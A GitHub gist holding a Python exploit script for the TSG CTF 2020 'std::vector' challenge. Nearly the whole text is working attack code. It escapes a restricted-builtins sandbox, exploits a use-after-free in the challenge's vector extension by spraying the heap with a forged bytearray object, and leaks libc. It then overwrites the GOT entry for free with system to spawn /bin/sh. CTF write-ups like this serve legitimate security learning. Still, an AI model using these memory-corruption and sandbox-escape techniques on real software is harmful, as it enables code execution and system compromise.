Skip to content

Instantly share code, notes, and snippets.

@Charo-IT

Charo-IT/exploit.py Secret

Created Jul 12, 2020
Embed
What would you like to do?
TSG CTF 2020 - std::vector
import stdvec
from sys import modules
del modules['os']
keys = list(__builtins__.__dict__.keys())
for k in keys:
# present for you
if k not in ['int', 'id', 'print', 'range', 'hex', 'bytearray', 'bytes']:
del __builtins__.__dict__[k]
def p64(v):
return v.to_bytes(8, "little")
def read_long(view, offset):
value = 0
for i in range(8):
value += view[offset + i] << (i * 8)
return value
def write_long(view, offset, value):
for i in range(8):
view[offset + i] = (value >> (i * 8)) & 0xff
sh = bytearray(b"/bin/sh\x00" + b"\x00" * 512)
l = stdvec.StdVec()
fake_bytearray = b""
fake_bytearray += p64(5) # ref_count
fake_bytearray += p64(0xa1ac40) # PyByteArray_Type
fake_bytearray += p64(0x10000) # obj_size
fake_bytearray += p64(0x10001) # size
fake_bytearray += p64(0xa00000) # buf
fake_bytearray += p64(0xa00000) # buf
fake_bytearray_address = id(fake_bytearray) + 0x20
# vectorに適当に要素を追加
for i in range(64):
l.append(i)
spray = []
cnt = 0
for x in l:
if cnt == 0:
# vectorのreallocを発生させる
# このとき、StdVecIterはrealloc前の領域を参照したままになる
l.append(0x1337)
for i in range(5):
# PyObject_Malloc(size) uses _libc_malloc if size > 512
spray.append(bytearray(p64(fake_bytearray_address) * (64 + i % 2)))
elif cnt == 1:
assert(x[0] == 0xc0)
view = x
break
cnt += 1
libc = read_long(view, 0x2f0) - 0x970e0
write_long(view, 0x520, libc + 0x4f4e0) # got overwrite (free -> system)
del sh
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment